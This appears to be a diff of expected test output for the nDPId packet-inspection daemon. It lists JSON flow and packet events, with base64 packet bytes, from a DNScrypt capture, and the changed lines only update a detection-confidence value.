AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304628,"pkt":"REREREREZmZmZmZmCABFAAIcpR5AAL0R55kKAAABKU9FDallAbsCCDEyBsUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304628,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304628,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739304628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":946739304628,"pkt":"ZmZmZmZmRERERERECABFAADPnjFAADcRIRzR+vEZCgAAAQG7hhQAu13p8VeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="} 
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739304629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":946739304629,"pkt":"ZmZmZmZmRERERERECABFAADPnjJAADcRIRvR+vEZCgAAAQG75+cAu\/wU8ViBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739304788,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739304788,"pkt":"ZmZmZmZmRERERERECABFAADSRcYAADIREz0pT0UNCgAAAQG7qlkAvgzwBsCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="} 
00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304789,"pkt":"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"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAXc6z8gAL0RfgsKAAABMw96+pfTAbsGBFECxkYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":84,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304789} 
00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":84,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAABQ6z8Aub0Rot4KAAABMw96+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAXc60AgAL0RfgoKAAABMw96+uk9AbsGBP+VxkgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":86,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304789} 
00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":86,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAABQ60AAub0Rot0KAAABMw96+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304789,"pkt":"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"} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
